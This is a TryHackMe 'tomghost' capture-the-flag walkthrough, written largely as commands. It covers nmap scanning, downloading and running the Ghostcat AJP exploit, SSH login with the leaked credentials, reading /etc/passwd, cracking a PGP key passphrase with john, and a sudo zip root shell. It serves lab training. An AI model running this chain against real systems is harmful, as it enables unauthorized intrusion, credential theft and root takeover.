TryHackMe: tomghost

  1. Port scan
nmap -Pn <ip>
nmap -A -p 22,53,8009,8080 <ip>
nmap --script vuln <ip>
The first scan shows 22, 53, 8009 and 8080 open; the -A scan fingerprints them. 8080 is Tomcat's HTTP connector and 8009 is its AJP connector, which is the entry point for the next step.
  2. Search for exploits
searchsploit tomcat 9
searchsploit -m 41783
wget https://www.exploit-db.com/download/48143
python 48143 <target ip>
EDB-ID 48143 is the Ghostcat (CVE-2020-1938) AJP file read/inclusion exploit. wget saves it under the bare name 48143, so the command above runs it as-is; it reads WEB-INF/web.xml from the web application through the AJP connector on 8009, and the credentials found there are what the SSH login below uses.
ssh skyfuck@<ip>
ls
cat /etc/passwd
su merlin
cd /home
ls
cd merlin
ls
cat user.txt
/etc/passwd shows merlin as the other interactive user; skyfuck's home holds credential.pgp and tryhackme.asc, which is where merlin's password comes from in the next step.
  3. Verify sudo rights
sudo -l
crontab -e
gpg2john credential.pgp
gpg2john tryhackme.asc
gpg2john tryhackme.asc > hash
john --wordlist=rockyou.txt hash
john hash --show
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
su merlin
sudo -l
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
cd /root
ls
cat root.txt
gpg2john only produces a crackable hash from the PGP private key (tryhackme.asc); credential.pgp is the encrypted message, so running gpg2john on it gives nothing. After john recovers the key passphrase, gpg --import asks for it and gpg --decrypt credential.pgp then prints merlin's password. As merlin, sudo -l shows zip can be run as root: -T tests the archive and -TT replaces the test command, so 'sh #' spawns a root shell (the # comments out the archive name zip appends). From that shell, root.txt is readable in /root.
